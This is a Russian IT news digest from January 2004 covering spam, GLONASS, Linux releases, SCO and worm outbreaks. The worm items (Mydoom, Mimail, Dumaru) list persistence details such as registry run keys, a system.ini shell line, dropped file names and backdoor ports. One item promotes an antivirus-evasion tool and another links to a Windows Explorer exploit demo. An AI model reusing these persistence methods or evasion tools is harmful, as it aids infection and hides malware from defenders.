Основатель корпорации Microsoft Билл Гейтс и глава ведущей компании по борьбе со спамом Brightmail Inc. Энрике Салем (Enrique Salem) уверены, что к 2006 году объемы нежелательных электронных писем будут существенно сокращены, сообщается во вторник на сайте CNN Money. Выступая на Всемирном экономическом форуме в Давосе, Гейтс рассказал о нескольких способах обуздать спаммеров. Во-первых, рассылку писем с определенного компьютера можно замедлить, используя "вычислительные головоломки", которые снижают производительность системы. Во-вторых, можно обязать пользователей оплачивать отправку писем, которые не были затребованы получателем. В Microsoft уверены, что "поток спама превратится в ручеек" уже через пару лет.
Подробности - http://money.cnn.com/2004/01/27/technology/...

28/01/2004 10:51 К концу года Россия планирует достроить свой аналог GPS.
В нынешнем году Россия планирует звершение основной фазы строительства собственной системы глобальной спутниковой навигации "ГЛОНАСС". Как сообщает агентство ИТАР-ТАСС, это произойдет после запуска в течение года трех спутников "Ураган". В Росавиакосмосе агентству пояснили, что успешное осуществление этих запусков, намеченных на последний квартал 2004 года, позволит стране к 2005 году иметь на орбите "полноценную группировку системы "ГЛОНАСС" в составе 16-18 аппаратов". Система "ГЛОНАСС" предназначена для непрерывной передачи координат воздушных, морских, наземных и космических объектов с точностью до одного метра". Как известно, в настоящее время в мире функционирует единственная система спутниковой навигации - американская NAVSTAR-GPS, обслуживающая военные нужды и наряду с этим использующаяся в коммерческих целях. Она включает 24 действующих спутника, способных определять координаты объектов с точностью до 10 метров. Евросоюз и его космическое агентство ESA в минувшем году также приступили к опытно-конструкторским работам по созданию собственной системы позиционирования Galileo. В процессе испытаний этой системы будет задействован российский спутник "Глонасс-М".
Источник - http://www.itar-tass.com/

27/01/2004 15:31 Китайская компания покусилась на господство MS Office.
Пакет Evermore Integrated Office 2004 написан на Java и работает почти на любой платформе, поддерживающей этот язык. Официальная продажа пакета на западных рынках начнется в феврале. Пакет Evermore Integrated Office (EIOFfice), разработанный малоизвестной китайской компанией Evermore Software, представляет собой комбинацию основных компонентов офисных систем, смешанную в одном флаконе. Если пользователям MS Office приходится возиться с четырьмя разными приложениями и четырьмя разными типами файлов, то в EIOffice все сделано проще: пользователь запускает одну многофункциональную программу и дальше уже делает с документом то, что ему нужно. Результаты его работы, как пишет PCWorld.com, сохраняются в едином формате, вне зависимости от того, что в них содержится: текст, таблица или мультимедийная презентация. Что самое интересное, производитель обещает, что впоследствии этот файл можно будет открыть на любой машине, на которой установлен EIOffice и поддерживается Java: как минимум, речь идет о Windows и Linux, а в скором времени к этому списку должны быть добавлены Mac OS X и Solaris. Кроме того, присутствует и «ограниченная» поддержка MS Office (созданный в «ворде» документ можно будет открыть, но написанные для «чужого» пакета макросы останутся проигнорированными). Так вот. Пока у Evermore Software есть только одна серьезная проблема: цена. Отдел продаж компании хочет получать за EIOffice 2004 99 долларов в год. По сравнению с тем же MS Office – это смешная сумма.
Источник - http://www.internet.ru

27/01/2004 14:22 В России появилась первая университетская сеть Wi-Fi.
На прошлой неделе в Нижегородском Государственном Университете имени Лобачевского была официально запущена первая в Восточной Европе зона беспроводного доступа на основе Wi-Fi (стандарт 802.11b) в образовательном учреждении. Проект был осуществлен российскими офисами корпораций Intel и Cisco Systems. Wi-Fi-сеть позволит ввести новые курсы в программу обучения и предоставит широкие возможности по дополнительному образованию студентов. На базе ННГУ корпорация Intel уже создалa собственную «кузницу кадров» для центра разработки, базирующегося в Нижнем Новгороде, а российский офис Cisco Systems намерен запустить там же «Сетевую Академию Cisco», которая будет готовить квалифицированных инженеров, имеющих официальный статус компании Cisco. Wi-Fi-сеть в ННГУ построена на базе 24 точек беспроводного доступа производства Cisco Systems, работающих в четырех корпусах университета. Они обеспечивают стабильную работу сети в радиусе от 20 до 50 метров, а ее топография рассчитана таким образом, чтобы закрыть максимальную площадь во всех публичных зонах. Наибольшая область приема обеспечивается в главном корпусе Университета, но и в остальных зданиях обязательными зонами покрытия стали места публичной деятельности, такие, как библиотеки, научные лаборатории и конференц-залы. В скором времени сеть должна заработать еще в нескольких корпусах.
Источник - http://www.cnews.ru

27/01/2004 13:06 XFree86 не объядинялась с X.org.
На сайте независимой организации разработчиков XFree86 категорически опровергли слухи, согласно которым сообщалось об объединении двух организаций: XFree86 и X.org. Как подчёркивается в сообщении, все отношения XFree86 не изменились с 1999 г. Также подчёркивается, что X.org является организацией, финансируемой разработчиками ПО и "железа", а потому отстаивающей инстересы этих производителей, в то время, как XFree86 является независимой организацией, которая отстаивает только интересы пользователей.
Подробности - http://xfree86.org/#news

27/01/2004 12:44 За время президентства Билл Клинтон отправил по e-mail только два письма.
В архивах, накопленных за время нахождения у власти Билла Клинтона, содержится 39,999,998 e-mail-сообщений, отправленных сотрудниками его администрации, и лишь два, высланных экс-президентом США собственноручно, сообщает журнал Variety. Первое письмо, по сути, является тестовым сообщением, отправленным для того, чтобы проверить, правильно ли американский лидер работал с программой-почтовым клиентом. Второе послание адресовано бывшему сенатору от штата Огайо, астронавту Джону Гленну (John Glenn), находившемуся в тот момент на орбите. В письме президент поздравлял его с тем, что почти через 40 лет после своего первого полета тот вновь вернулся в космос. Как шутят журналисты, Гленн стал не только первым американцем, облетевшим землю, но и единственным человеком, получившим электронное письмо от Билла Клинтона. "Данный факт не означает, что экс-президент не разбирается в технике", - заявил Скип Разерфорд (Skip Rutherford), руководящий фондом имени Клинтона. По его словам, до сих пор экс-президент больше предпочитает делать заметки на бумаге или говорить по телефону. "Я не думаю, что нынешний президент Джордж Буш отправляет e-mail-послания собственноручно", - добавил Разерфорд.
Источник - http://www.lenta.ru

27/01/2004 12:20 Архитектура "тонкого" клиента в Windows NT/2000.
Благодаря сайту www.sysadmins.ru обнаружен неплохой перевод книги Тодда Мазерса "Архитектура "тонкого" клиента в Windows NT/2000", которая посвящена реализации терминальных служб и Citrix MetaFrame. Главы представлены в заархивированном (ZIP) DOC-формате.
Книга - http://thinclient.narod.ru/mathers.html

27/01/2004 11:34 Подробности о черве W32.Novarg.A.
Компания Symantec Довольно оперативно провела анализ нового червя, о появлении которого мы писали чуть ниже. Помимо обычного анализа червя были выявлены довольно любопытные подробности. Так, при заражении червём устанвливается компонент shimgapi.dll (ключ HKEY_CLASSES_ROOTCLSID{E6FB5E20-DE35-11CF-9C87-00AA005127ED}InProcServer32), который запускает прокси-сервера на портах 3127-3198, слушающий запрос на установление соединения. Также устанавливаемыый бэкдор позволяет загружать произвольные файллы на заражённую машину и запускать их. В период между 1-12 февраля нынешнего года червь запускает DoS-атаку на лучшего "друга" всех юниксоидов - сайт компании SCO (www.sco.com). Для этого с каждой заражённой машины формируется 64 GET-запроса по протоколу http (порт 80/tcp). Уязвимы для червя ОС: Win9x/ME, NT/XP/2K/2003. Более подробный анализ и процедура удаления доступны на сайте Symantec по ссылке, приведённой ниже.
Подробности - http://securityresponse.symantec.com/avcenter/venc/data/w32.novarg.a@mm.html

27/01/2004 11:15 Летом выйдет сервис-пак для Office 2003.
Компания Microsoft готовит к выпуску первый набор исправлений к компонентам системы Office 2003. Помимо традиционного пакета из офисных программ Word, Excel, PowerPoint и Outlook, компонентами системы являются поставляемые отдельно клиентские и серверные приложения. В состав сервис-пака войдут обновления Microsoft Office 2003 Suite и самостоятельных программ InfoPath 2003, OneNote 2003, Project 2003, Publisher 2003, Visio 2003, серверных пакетов SharePoint Portal Server и Windows SharePoint Services. Как правило, Microsoft выпускает первый сервис-пак к своим продуктам через шесть-девять месяцев после их выхода на рынок. Не станет исключением и Office 2003. Соответствующий сервис-пак должен выйти в июне нынешнего года. Пока представители Microsoft подтверждают планы по выпуску пакета обновлений, но отказываются сообщать подробности о его составе. Скорее всего, в состав сервис-пака войдут все обновления, выпущенные в самостоятельном виде, а также дополнения, затрагивающие функциональность пакета и доступные только в составе сервис-пака.
Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=1093...

27/01/2004 10:50 Очередная масштабная эпидемия нового червя I-Worm.Novarg (Mydoom).
Служба круглосуточного мониторинга "Лаборатории Касперского" сообщает о зафиксированом ночью, 27 января 2004 года, начале крупномасштабной эпидемии почтового червя Novarg, также известного как Mydoom. В настоящий момент всеми антивирусными компаниями данному червю присвоен максимальный уровень опасности. Количество зараженных писем в интернет исчисляется несколькими миллионами экземпляров. Подробный анализ кода вируса будет опубликован позднее. Процедуры обнаружения и удаления данного червя уже добавлены в антивирусные базы "Антивируса Касперского". По сообщению Reuter, вирус MyDoom или Novarg рассылается в присоединенных файлах с расширением .exe, .scr, .zip или .pif. В заголовке письма часто стоят слова "test" или "status." Запущенный "червь" рассылает себя по всем e-mail-адресам, содержащимся в компьютере жертвы. По словам специалистов, последствия его деятельности - сбои в работе почтовых серверов и резкое увеличение сетевого трафика, особенно - в сетях крупных корпораций. От себя хотелось бы добавить (newsmaker), что мне пришло сегодня утром письмо от одной питерской компании, к которому был приаттачен файл с названием "document.zip", размер 22 637 байт. Сабж письма - "Server Report". Внутри архива содержится pif-файл с таким же названием. Быстрй анализ показал, что упакован файл действительно UPX. DrWeb с самыми свежими базами его не определил. Онлайновая проверка на сайте "Лаборатории Касперского" оказалась на высоте и червь был опознан. Аналогичная онлайн-проверка на сайте drweb.ru определила заразу, как Win32.HLLM.MyDoom.32768. Cудя по всему, господин Данилов и Co. пока не включили сигнатуру в крайнюю базу антивируса.
Подробности - http://www.reuters.co.uk/printerFriendlyPopup.jhtml?...

26/01/2004 20:27 Массовая кража аккаунтов на LiveJournal.
Причем старым как мир способом - социальной инженерией. Вчера в одном из журналов появилась формочка, предлагающая всем желающим новые варианты оформления журнала. Не прошло и нескольких часов, как русская часть LiveJournal была заполонена этими формочками, которые ведут на сайт www.elsetoday.com. Судя по данным whois, сайт зарегистрирован на жителя Минска, фамилия и имя которого подозрительно хорошо подходят к журналу-источнику заразы. Все формочки удаляются администрацией русской части LiveJournal и модераторами сообществ, но волна пока не иссякла. Более того, постоянно появляются новые жертвы, слезно молящие о том, чтобы им вернули их журнал.
Источник - http://www.bugtraq.ru

26/01/2004 18:21 С хакерами будут бороться с помощью скриптов-мутантов.
Программисты американской компании Icosystem из Кембриджа, штат Массачусетс, работают над новым способом борьбы с компьютерными вирусами, сообщает New Scientist. Этот метод защитит компьютерные сети даже от тех вирусов, которые еще не написаны, а также от хакерских атак с использованием уязвимостей в сетевом программном обеспечении. Бороться с вирусами будущего планируется с помощью специальной программы, которая предсказывает возможное развитие искусства "вирусописания", основываясь на текущем положении дел. Программа, работа над которой ведется в компании, путем искусственной "эволюции" существующих типов вирусных и хакерских атак сама займется написанием новых вредоносных программ, чтобы обеспечить возможность защиты компьютерных сетей от новых напастей. Уже разработанная первая версия программы предназначена для поиска новых методов взлома компьютерных сетей через уязвимое сетевое ПО. Результатом работы программы являются новые скрипты для проникновения в удаленную систему. В настоящее время большинство атак используют известные прорехи в веб-серверах. Межсетевые экраны анализируют входящий трафик на предмет соответствия типовым хакерским атакам и пресекают таковые. Однако если немного изменить "атакующий" скрипт, то брандмауэр может его и не распознать. Именно на создание модифицированных скриптов и рассчитана программа американской компании. В будущем планируется применить аналогичный метод для "разведения" модификаций известных вирусов и создания защиты от них. Подобные "интеллектуальные" методы защиты могут привести к появлению совершенно нового поколения систем обнаружения взлома, однако есть у такого подхода и свои проблемы. Одна из них - большое количество сигнатур, с которыми системам защиты придется работать для обнаружения хакерских атак. Это может значительно снизить эффективность работы подобной системы.
Источник - http://www.compulenta.ru

26/01/2004 18:14 Уязвимость в Windows XP.
По видимому, довольно известный в мире специалистов по секьюрити, господин под ником http-equiv (на его счету не одна обнаруженная уязвимость как в ОС Windows, так и в "горячо" любимом браузере всех времён и народов IE) тоже прослышал о присвоении титула рыцаря Британской империи Биллу Гейтсу и решил преподнести подарок создателю "ОС для кухарки". Им была обнаружена довольно любопытная уязвимость в ОС Windows XP, вернее в файловом браузере этой ОС Windows Explorer. Автором был создан html-файлик, который содержит в себе скрипт и выполнимый файл (*.exe). После этого файл переименовывается в файл с расширением .folder, что приведёт к тому, что при просмотре его в Explorer-е он будет отображён в виде папки. Однако при попытке открытия подобной папки будет выполнен внедрённый в файл скрипт, который в свою очередь вызовет для выполнения .exe-секцию файла. Таким образом, возникает широкое поле для деятельности всевозможных троянов. Автор также выпустил демо-файл, который наглядно демонстрирует действие уязвимости.
Демо - http://www.malware.com/my.pics.zip

26/01/2004 18:09 Москва переходит на 11-значные телефонные номера.
С 19 января московские телефонисты приступили к глобальной реконструкции всех городских АТС. Планируется, что переход на 11-значные телефонные номера по всему городу может начаться уже во второй половине 2004 года. Для начала стратеги из МГТС решили ввести телефонные номера запасного 6-го миллиона. К весне телефонные номера с первыми цифрами 284, 281, 288 и 971 будут начинаться так: 684, 681, 688 и 631. Нововведение должно затронуть около 40 тысяч абонентов. Заодно в Центральном округе введут еще 9 тысяч новых номеров. По плану реконструкция телефонных сетей продлится до 2010 года. К этому времени Москва должна полностью перейти на 11-значную нумерацию своих телефонов. Как пояснили в МГТС, первым делом город разделят на две кодовые зоны - 095 и 499. Граница раздела зон пройдет по линии Москвы-реки, поэтому для звонка из южных районов в центр или на север абонентам потребуется набирать 8-095, а потом 7 цифр номера. В пределах одной кодовой зоны можно будет набирать 7 цифр. Главную новость, касающуюся предстоящей реконструкции, менеджеры МГТС обнародовали только недавно - оказывается, при введении новых телефонных кодов будет меняться и основной телефонный номер. Шансов сохранить старый номер нет практически ни у одного абонента МГТС. Подробности и технические тонкости перехода на новые номера сотрудники МГТС не разглашают и не комментируют. Ясно только, что на 11 цифр Москва будет переходить, начиная с Марьина, Южного Бутова и Куркина. Чтобы позвонить в эти районы, обладателям 7-значных номеров надо будет набрать федеральный код 8-499, а абонентам внутри кодовой зоны для связи с городом потребуется ввести 8-095. Причем эти звонки не будут считаться междугородними.
Источник - http://top.rbc.ru

26/01/2004 17:56 Системы хранения данных сольются в iSCSI.
Для повышения эффективности и уменьшения стоимости хранения данных EMC, IBM и менее известные фирмы, специализирующиеся на системах хранения данных, такие как BlueArc, начинают соединять лучшие элементы устройств NAS (network-attached storage) и SAN (storage area networks). Системы NAS, которые подключаются к существующим сетям Ethernet, проще в управлении, но их производительность ниже, а емкость ограничена. Системы SAN обычно быстрее и вмещают больше данных, но они дороги и в них трудно организовать многопользовательскую работу с файлами. Например, агентство Law Enforcement Support Agency, предоставляющее такие услуги, как хранение архивов местных отделений правоохранительных органов в штате Вашингтон, выбрало систему BlueArc SiliconServer емкостью 6 Тбайт, которая построена на архитектуре NAS (она обслуживает файлы по сети Ethernet), но сулит быстродействие SAN. «Мы не ощущаем никакого понижения производительности, — говорит ИТ-менеджер агентства Дэвид Рейнкер. — В некоторых случаях она даже немного повысилась». Емкость продукты BlueArc SiliconServer обеспечивают такую же, как у SAN, — до 256 Тбайт в одном шкафу. В понедельник компания планирует представить новый продукт Titan SiliconServer, в котором также сочетаются элементы систем NAS и SAN. Его емкость можно наращивать еще больше, и в него добавлены такие функции, как возможность со временем повышать быстродействие.
Подробности - http://www.zdnet.ru/?ID=312821

26/01/2004 17:43 Недельный отчет о вирусах Panda Software.
Выпущен традиционный еженедельный отчёт о вирусах компании Panda Software. В отчете, посвященном событиям прошедшей недели, в первую очередь рассмотрен червь Bagle.A, распространившийся по всей планете в течение этой недели, а также два троянца, принадлежащих тому же семейству: StartPage.AB и StartPage.AC.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=230

26/01/2004 17:19 Появление I-Worm.Mimail.q.
"Лаборатория Касперского" сообщает об обнаружении новой версии почтового червя Mimail. Данный вариант, получивший обозначение I-Worm.Mimail.q, в настоящее время активно распространяется в зараженных электронных письмах. Зараженные письма имеют следующие данные. Адрес отправителя: произвольное. Тема письма: "very cool picture only for you". Текст письма: "Good evening my dearest [произвольное имя], I wondered My brother had best sex I ever seen last night togather with the boss of [произвольное имя] %-) I switched on my samsung camera and make excellent images! Please don't show pictures to your bro, okay?". Имя вложения: private[произвольно]. Размер вложения - 32KB. Инсталляция
После запуска червь копирует себя в каталог Windows с именем "sys32.exe", а также извлекает из себя файл "outlook.exe", который является главным компонентом червя. Данный файл также копируется в каталог Windows. Червь ищет адреса электронной почты в файлах, расширение которых отлично от com, wav, cab, pdf, rar, zip, tif, psd, ocx, vxd, mp3, mpg, avi, dll, exe, gif, jpg и bmp, и рассылает себя по найденным. Червь содержит в себе backdoor-функцию, открывающую на зараженном компьютере порт 6667 TCP для приема команд.
Источник - http://www.kaspersky.ru

26/01/2004 15:46 Билл Гейтс удостоится титула рыцаря Британской империи.
Великобритания намерена присвоить основателю и главе компании Microsoft почетный титул рыцаря, сообщается на сайте CNN. Поскольку Гейтс не является британским подданным, он не сможет прибавить слово "сэр" к своему имени, но, тем не менее, будет именоваться "рыцарем-командором Британской империи". Как сказано в официальном заявлении МИД Великобритании, титул присваивается самому богатому человеку планеты за развитие британского бизнеса, увеличение количества рабочих мест, создание образовательных программ и благотворительную деятельность. Кроме того, говорится в заявлении, Гейтс содействовал повышению уровня жизни бедных слоев населения в странах-членах Британского Содружества. Представители Microsoft уже заявили, что Гейтс "очень обрадован" пожалованным ему титулом. Дата проведения официальной церемонии посвящения пока не известна, и будет определена позже "на основании пожеланий обеих сторон".
Источник - http://www.lenta.ru

26/01/2004 15:29 Люберецкие пираты погорели на "Властелине колец".
В подмосковных Люберцах ликвидирован подпольный склад, на котором хранилось около 80 тысяч контрафактных DVD-дисков. Как сообщили РИА "Новости" в ГУБЭП, оперативники появились на складе в тот момент, когда его работники расфасовывали пиратские копии фильма "Властелин колец". Кроме дисков, на складе изъято несколько тысяч буклетов, а также бухгалтерская и другая документация, свидетельствующие о причастности руководителей фирмы к распространению контрафактной продукции. Диски продавались от имени ООО "Пласт-Плюс" в мелкооптовых торговых точках по цене от 80 до 90 рублей. По предварительным данным, ущерб, нанесенный люберецкими пиратами правообладателям, составил 25 миллионов рублей.
Источник - http://www.rian.ru/

25/01/2004 19:34 Бинарные патчи для FreeBSD 5.
Colin Percival представил, не поддерживаемую официально, систему бинарных security апдейтов для FreeBSD 5 (раньше подобная система была доступна для FreeBSD 4), сообщает opennet.ru. Схема бинарных апдейтов удобна при большом числе похожих машин в сети, тогда достаточно применить патч на одной машине и распространить по другим в бинарном виде, без затрат на пересборку из исходных текстов.
Подробнее - http://www.daemonology.net/freebsd-update/

25/01/2004 18:31 Защита CD от копирования станет демократичнее
Компания Macrovision, специализирующаяся на системах защиты от копирования компакт-дисков, объявила о выпуске новой версии системы с индексом CDS-300. Как и прошлые разработки Macrovision, эта система основана на записи на компакт-диска второй сессии, содержащей файлы в формате Windows Media Audio. Если вставить такой диск в обычный плеер, то он "увидит" только первую сессию с обычными музыкальными дорожками. Если же вставить диск в компьютер, то доступной будет только вторая сессия с файлами WMA. Скопировать в компьютер обычные треки при этом не получится. Главное отличие CDS-300 от прошлых версий защитных систем Macrovision заключается в более мягких ограничениях на использование файлов из второй сессии. Как и ранее, все они защищены с помощью технологии управления цифровыми правами, встроенной в формат Windows Media. Но если раньше эти файлы нельзя было переписать на болванку или в память портативного плеера, то теперь эти ограничения частично сняты. По своим свойствам файлы WMA, записанные во вторую сессию диска, теперь аналогичны композициям, которые можно приобрести через интернет, например, через службу Napster 2.0.
Подробности - http://news.com.com/2100-1027_3-5145961.html

25/01/2004 18:05 Вышел Mandrake 10.0 beta.
Французская компания Mandrake сегодня анонсировала выход первой бета-версии дистрибутива Mandrake 10 beta1. ISO-образы трёхдискового комплекта доступны для свободного скачивания на различных зеркалах, указанных на сайте. Думаю, не стоит повторять, что новый дистрибутив построен на ядре 2.6.x, придающем системе большую надёжность за счёт встроенных улучшений (звуковая архитектура ALSA или функция управления тактовой частотой процессора для лучшего энергосбережения). Также в дистрибутив вошли новые версии Glibc 2.3.3 с поддержкой NPTL, XFree86 4.4pre, графической оболочки KDE 3.2pre, браузера Mozilla 1.6, а также новый центр управления Mandrake и многое другое. Обладатели скоростных подключений к сети (или терпеливые владельцы модемов) уже сейчас могут пользоваться операционной системой завтрашнего дня, cообщает linux.org.ru.
Подробности - http://www.mandrakelinux.com/en/100beta.php3

25/01/2004 17:27 UPXredir.
Вашему вниманию предлагается довольно занятная утилитка, целью которой является преобразование UPX-файла (при помощи изменения различных секций файла), что позволяет обмануть различные антивирусы (так утверждает автор) и обойти их встроенные механизмы декодирования. С точки зрения антивирусов подобный файл представляет собой обычный raw-файл. Утилита включает в себя как исходники, так и бинарники. Язык программирования - Delphi 6. Утилита получена из списка рассылки TH-Research.
Подробности - http://archphase.united.net.kg/projects.html

25/01/2004 14:37 DeCSS можно распространять.
Закрыто дело Ассоциации по контролю копирования DVD (DVD CCA) в отношении калифорнийца, распространявшего DeCSS, сообщает bugtraq.ru. Этим подводится итог четырехлетнего противостояния индустрии медиа против IT-компаний и экспертов по интеллектуальной собственности. Судя по заявлению ассоциации, она все же предпримет ряд шагов по обереганию системы CSS для защиты DVD от копирования ("мы вам еще покажем"?).
Подробности - http://www.pcworld.com/news/article/0,aid,114417,00.asp

25/01/2004 13:11 Электронный журнал "Спамтест" No. 33.
Вышел очередной, 33-й номер электронного журнала "Спамтест". В этом номере представлены темы: Новости; Спам: итоги 2003 года (Аналитический отчет). особый интерес представляет именно второй раздел, в котором как бы подводятся итоги ушедшего года. В документе дается подробный анализ качественного и количественного роста спама в прошедшем году, раскрываются новые технологии спамеров, рассказывается о совершенствовании антиспам-фильтров, усилении противодействия спаму в России и за рубежом. Приведен статистический анализ спамерских тематик в прошедшем году как в русскоязычном, так и в зарубежном спаме. Подведены итоги первых недель нового года и дан прогноз на 2004 год. Очень любопытный документ. Хотелось бы, чтобы власть предержащие (есть надежда, что через спам-фильтры Госдумы всё-таки пробивается энное количество этой заразы) всё-таки по примеру западных коллег тоже начали бороться с этой заразой.
Подробности - http://www.kaspersky.ru/news.html?id=145264551

24/01/2004 21:53 AOL будет бороться с подделкой адресов электронной почты.
America Online - интернет-подразделение медиагиганта Time Warner - начинает тестирование собственной системы защиты от подделки обратных адресов электронной почты. Подделка адресов часто применяется спамерами и авторами почтовых червей, для того чтобы замаскировать реальный источник рассылки и обойти фильтры спама, использующие черные списки адресов. Для борьбы с подделкой адресов AOL предложила использовать для пересылки электронной почты новый протокол под названием Sender Permitted From или SPF. Этот протокол позволяет указывать, какие почтовые серверы могут отправлять корреспонденцию из конкретного домена. При этом почтовая программа на клиентском компьютере или сервере, получив отправленное по протоколу SPF письмо, сможет запросить систему DNS и выяснить, отправлено ли письмо нужным сервером, или же отправитель пытается подделать адрес. Впрочем. для того чтобы система работала эффективно, необходимы широкое распространение нового протокола и поддержка его клиентским программным обеспечением. Пока об использовании SPF объявила только AOL, которая будет использовать новый протокол для всех 33 млн. почтовых ящиков, зарегистрированных в ее сети. При этом AOL далеко не единственный на рынке игрок, пытающийся бороться с подделкой адресов электронной почты. Например компания Yahoo предлагает использовать для этой цели технологию доменных ключей, которые будут использоваться для идентификации серверов друг другом и подтверждения подлинности отправителя. Вполне вероятно, что обе технологии в ближайшее время будут конкурировать между собой.
Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=1093...

24/01/2004 18:47 Opera заявляет о намерениях.
После выхода Opera 7 для мобильных устройств и успешного дебюта на Sharp Zaurus, Opera Software планирует ввод в строй новой технологии – MSR (Medium-Screen Rendering), предназначенной, как следует из названия, для устройств со средним размером экрана, сообщает mobile-review.com. Уже использующаяся система SSR (Small-Screen Rendering) разработана для стандартных экранов смартфонов и карманных компьютеров, тогда как новая нацелена на устройства с экраном разрешением от 320х320 до 800х600. Обеспечивается комфортное отображение сайта с сохранением шрифтов, цветов, элементов стиля, то есть производится только модификация размещения элементов на странице. MSR соответствует новым рекомендациям от World Wide Web Consortium (W3C).
Подробности - http://www.infosyncworld.com/news/n/4510.html

24/01/2004 18:21 Сообщество Linux обвинили в антиамериканской деятельности.
Компания SCO не теряет надежды откусить свой кусок от пирога Linux. Будучи не в силах доказать факт кражи исходников Unix для создания бесплатной ОС, руководство компании пустило в ход тяжелую артиллерию, написав патриотическое письмо 535 членам Конгресса. Письмо, отправленное еще восьмого января американским конгрессменам, таинственным образом попало в руки одного из сторонников софта с открытым кодом, и было обнародовано усилиями организации Open Source and Industry Alliance (OSAIA). Судя по заметке в журнале InfoWorld, письмо являет собой потрясающий образец патриотизма и заботы о будущем американских программистов и их еще не рожденных детей. Пытаясь избавиться от прилипшего к руководству SCO имиджа эгоистичных бесстыдных вымогателей, автор письма попытался надавить на два оголенных нерва американской демократии: (1) самочувствие IT-отрасли, все еще пребывающей в состоянии некоторого упадка, и (2) борьба с мировым терроризмом вообще и ядерными амбициями стран третьего мира в частности. Во-первых, указывается в письме, программное обеспечение с открытым кодом наносит прямой ущерб экономике США, поскольку любой африканский программист-самоучка из племени пигмеев может бесплатно взять исходник той же Linux и осчастливить свой народ локализованной и заточенной исключительно под пигмейские нужды операционной системой. Во-вторых, отмечает автор письма, «любой специалист по компьютерам из Северной Кореи, в распоряжении которого найдется некоторое количество персональных компьютеров и связь с интернетом, может скачать новейшую версию Linux, поддерживающую работу с многопроцессорными системами [технологию, якобы украденную из кода Unix], и в сжатые сроки построить виртуальный суперкомпьютер».
Источник - http://www.runet.ru

24/01/2004 18:08 MySQL разработал графический интерфейс администратора.
Компания MySQL разработала первую систему администрирования с графическим интерфейсом для своей базы данных с открытым кодом, сообщает linux.org.ru. Программа MySQL Administrator сохранила все возможности старых утилит с интерфейсом командной строки, а также включает новые. Вот некоторые задачи, которые администраторы баз данных смогут выполнять с новой консолью: конфигурирование сервера, администрирование пользователей, мониторинг базы, резервное копирование и восстановление данных, а также управление регистрацией событий. Компания планирует предлагать MySQL Administrator с двойной лицензией - бесплатно с лицензией GNU General Public Licence (GPL) и с лицензией на коммерческое использование. Изначально, MySQL Administrator будет доступен только для Microsoft Windows и Linux.
Подробности - http://www.mysql.com/products/administrator/index.html

24/01/2004 17:54 Zone-H запустила сервис предупреждения о взломах сайтов.
Как сообщает dl на bugtraq.ru, Zone-H уже давно ведет архив зеркал взломанных сайтов, поэтому вполне логичной идеей стало его использование в мирных целях. Теперь можно зарегистрировать свой сайт в службе раннего предупреждения (Early Warning), и, если случится неприятность и этот сайт окажется очередным кандидатом на занесение в коллекцию, веб-мастер сразу будет об этом извещен.
Подробности - http://www.zone-h.org/warnlist

24/01/2004 17:38 Появление червя I-Worm.Dumaru.j.
"Лаборатория Касперского" зафиксировала активное распространение в интернет новой версии почтового червя Dumaru. Распространяется через Интернет в виде файлов, прикрепленных к заражённым письмам. Червь содержит в себе функции бэкдора и троянской программы для кражи информации. Червь является приложением Windows (PE EXE-файл), упакован утилитой FSG, размер упакованного файла около 17К, распакованного - около 43К. При инсталляции червь копирует себя с именами "l32x.exe" и "vxd32v.exe" в системный каталог Windows, а также в %starup% каталог, с именем "dllxw.exe". Регистрирует себя в ключе автозапуска системного реестра: HKLMSoftwareMicrosoftWindowsCurrentVersionRun "load32 = %windir%\%system%l32x.exe". На компьютерах, работающих под управлением операционной системы Windows 95,98,ME червь изменяет секцию в файле "system.ini":
[boot]
shell=explorer.exe %System%vxd32v.exe
Червь ищет файлы "*.HTM", "*.WAB", "*.HTML", "*.DBX", "*.TBB", "*.ABD" во всех каталогах на доступных локальных дисках, выделяет из них строки, являющиеся адресами электронной почты, и рассылает по этим адресами заражённые письма. Для этого червь создает ZIP-архив, во временном каталоге Windows c именем "zip.tmp", который в дальнейшем добавляется в качестве вложения к письмам. Червь также создаёт файл "winload.log" в каталоге Windows и записывает в него обнаруженные адреса электронной почты, по которым ведется рассылка заражённых писем. Зараженные письма имеют в качестве отправителя адрес: "Elene" <******SUICIDE@HOTMAIL.COM>. Тема письма: Important information for you. Read it immediately! Текст письма: "Hi! Here is my photo, that you asked for yesterday". Вложение: myphoto.zip. Для рассылки писем червь использует прямое обращение к SMTP-серверу, подставляя в качестве обратного адреса адрес "address@dyandex.ru". Таким образом все сообщения почтовых сканеров об обнаруженных в письмах экземплярах червя будут направляться на этот адрес. Червь открывает на зараженном компьютере порт 10000 для приема команд, что позволяет удаленно управлять зараженной системой. Также червь обладает функцией клавиатурного шпиона и способен сохранять всю вводимую с клавиатуры информацию в отдельном файле.
Источник - http://www.kaspersky.ru

24/01/2004 17:13 В Москве задержаны два хакера.
Как передает телекомпания НТВ, «сетевые» взломщики - 16-летний московский школьник и его 26-летний друг, работающий водителем, проживали в одном подъезде. Несколько дней назад в управление «К», которое ведет войну с хакерами, обратились представители одного из сетевых провайдеров. Сотрудники фирмы, предоставляющей так называемые «мак-адреса» (бред какой-то, по-видимому, имелись в виду IP-адреса - прим. ньюсмейкера) для входа в Интернет, заявили оперативникам, что их услуги нещадно воруют. Эксперты управления вычислили, что хакеры попадают в Интернет, сперва копируя, а затем, подменяя данные сетевых карт, то есть те самые «мак-адреса». Визит милиционеров стал для взломщиков неприятным сюрпризом. Неожиданность ждала и оперативников. У юного нарушителя нашли «удостоверение хакера» - такие шуточные «документы» можно купить в специальных магазинах. Также выяснилось, что для проникновения в сеть взломщики использовали коммутатор. Он соединяет компьютеры, подменяющие «мак-адреса». Один из задержанных некогда купил у провайдера интернет-карту и первое время законно пользовался своим трафиком. Но потом, когда срок действия карты истек, он придумал, как скопировать реквизиты доступа других пользователей, которые, не зная того, станут оплачивать ему круглосуточный Интернет. Интернет может обойтись двум хакерам очень дорого - вплоть до тюремного срока. Впрочем, самому юному взломщику, вероятно, удастся избежать уголовной ответственности. Как и многим другим школьникам, задержанным Управлением «К» в прошлом году. Как
показывает практика, подростки составляют значительную часть в среде компьютерных пиратов. По данным Управления «К», большинство хакеров – подростки, в возрасте от 14 лет. Иногда попадаются и 40-летние. Оперативники отмечают среди взломщиков группу людей в возрасте старше 21 года, которые совершают эти преступления профессионально. То есть, кроме того, что они совершают неправомерный доступ к компьютерной информации, они используют эту информацию, для того, чтобы осуществлять шантаж в отношении коммерческих фирм.
